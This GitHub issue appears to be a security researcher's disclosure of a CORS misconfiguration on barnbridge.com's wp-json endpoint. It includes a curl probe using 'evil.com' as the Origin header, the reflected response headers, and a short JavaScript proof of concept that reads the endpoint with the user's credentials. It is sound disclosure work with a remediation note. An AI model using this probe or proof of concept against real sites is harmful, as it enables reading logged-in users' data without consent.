Skip to content

CORS MISCONFIGURATION - website issue #11

New issue
New issue
Open
Open
CORS MISCONFIGURATION - website issue#11
@Dgirlwhohacks

Description

@Dgirlwhohacks
Dgirlwhohacks
opened on Apr 26, 2021

Hey Sec Team

CORS MISCONFIGURATION

I have found CORS misconfiguration at your main Domain https://www.barnbridge.com/ the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.This bug could be used to steal users information or force the user to execute unwanted actions. As long that a legit and logged in user is lure to access a attacker controlled HTML page CORS misconfiguration is found on https://www.barnbridge.com/wp-json/ as "Access-Control-Allow-Origin" is dynamically fetched from client Origin header with "Credentials" set as true.

Exploiting CORS misconfiguration.

root@kali:~# curl -I https://www.barnbridge.com/wp-json/ -H 'Origin:evil.com'

HTTP/2 200
date: Mon, 26 Apr 2021 05:39:21 GMT
server: Apache
x-powered-by: PHP/7.3.23
x-robots-tag: noindex
link: https://barnbridge.com/wp-json/; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
allow: GET
access-control-allow-origin: http://evil.com
access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
access-control-allow-credentials: true

  1. Save the code any.html open https://example.com open in any browser and you would find it pops up user information like the attachment.

Code:

<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://www.barnbridge.com/wp-json/', true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); }; </script>

Remediation:

Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

Impact:

Also If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.

Fix it ASAP

Best Regards,
barn
Divya Singh - @Dgirlwhohacks

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions